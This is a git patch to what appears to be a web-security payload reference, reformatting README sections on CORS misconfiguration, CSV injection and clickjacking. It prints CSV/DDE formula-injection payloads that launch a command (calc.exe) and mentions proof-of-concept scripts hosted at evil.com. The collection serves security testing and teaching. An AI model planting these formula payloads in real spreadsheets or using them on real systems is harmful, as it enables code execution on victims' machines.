From a16f8a6de1554bcdb9d0dc1f5c4e636263a47ce4 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 28 Nov 2024 21:36:01 +0100 Subject: [PATCH] Path Traversal + CSV Injection --- CORS Misconfiguration/README.md | 8 +- CSV Injection/README.md | 21 +- Clickjacking/README.md | 7 + Command Injection/README.md | 214 +++++++++---------- Cross-Site Request Forgery/README.md | 7 +- DOM Clobbering/README.md | 20 +- Dependency Confusion/README.md | 5 + Directory Traversal/README.md | 308 +++++++++++++++++---------- 8 files changed, 345 insertions(+), 245 deletions(-) diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index c6d5b87..7ca76b3 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -54,7 +54,7 @@ Access-Control-Allow-Credentials: true {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept This PoC requires that the respective JS script is hosted at `evil.com` @@ -118,7 +118,7 @@ Access-Control-Allow-Credentials: true {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept This can be exploited by putting the attack code into an iframe using the data URI scheme. If the data URI scheme is used, the browser will use the `null` @@ -175,7 +175,7 @@ Access-Control-Allow-Origin: * {"[private API key]"} ``` -#### Proof of concept +#### Proof Of Concept ```js var req = new XMLHttpRequest(); @@ -210,7 +210,7 @@ Access-Control-Allow-Credentials: true ``` -#### Proof of concept (Example 1) +#### Proof of Concept (Example 1) This PoC requires the respective JS script to be hosted at `evilexample.com` diff --git a/CSV Injection/README.md b/CSV Injection/README.md index eb856d9..d29b155 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -11,6 +11,16 @@ ## Methodology +CSV Injection, also known as Formula Injection, is a security vulnerability that occurs when untrusted input is included in a CSV file. Any formula can be started with: + +```powershell += ++ +– +@ +``` + + Basic exploits with **Dynamic Data Exchange**. * Spawn a calc @@ -30,7 +40,6 @@ Basic exploits with **Dynamic Data Exchange**. ```powershell =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A - +thespanishinquisition(cmd|'/c calc.exe'!A = cmd|'/c calc.exe'!A ``` @@ -52,16 +61,6 @@ Technical details of the above payloads: - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data -Any formula can be started with - -```powershell -= -+ -– -@ -``` - - ## References - [CSV Excel Macro Injection - Timo Goosen, Albinowax - Jun 21, 2022](https://owasp.org/www-community/attacks/CSV_Injection) diff --git a/Clickjacking/README.md b/Clickjacking/README.md index 43780cb..45c85e9 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -42,6 +42,7 @@ the attacker can trick the user into interacting with the hidden content, believ * Positioning and Layering: By setting the CSS properties such as `position: absolute; top: 0; left: 0;`, the transparent element is positioned to cover the entire viewport. Since it's transparent, the user doesn't see it. * Misleading User Interaction: The attacker places deceptive elements within the transparent container, such as fake buttons, links, or forms. These elements perform actions when clicked, but the user is unaware of their presence due to the overlaying transparent UI element. * User Interaction: When the user interacts with the visible interface, they are unknowingly interacting with the hidden elements due to the transparent overlay. This interaction can lead to unintended actions or unauthorized operations. + ```html
Click me @@ -56,9 +57,11 @@ The content inside these invisible frames can be malicious, such as phishing for * **How Invisible Frames Work:** * Hidden IFrame Creation: The attacker includes an ` ``` + * Loading Malicious Content: The src attribute of the iframe points to a malicious website or resource controlled by the attacker. This content is loaded silently without the user's knowledge because the iframe is invisible. * User Interaction: The attacker overlays enticing elements on top of the invisible iframe, making it seem like the user is interacting with the visible interface. For instance, the attacker might position a transparent button over the invisible iframe. When the user clicks the button, they are essentially clicking on the hidden content within the iframe. * Unintended Actions: Since the user is unaware of the invisible iframe, their interactions can lead to unintended actions, such as submitting forms, clicking on malicious links, or even performing financial transactions without their consent. @@ -70,11 +73,13 @@ Button/Form Hijacking is a Clickjacking technique where attackers trick users in * **How Button/Form Hijacking Works:** * Visible Interface: The attacker presents a visible button or form to the user, encouraging them to click or interact with it. + ```html ``` * Invisible Overlay: The attacker overlays this visible button or form with an invisible or transparent element that contains a malicious action, such as submitting a hidden form. + ```html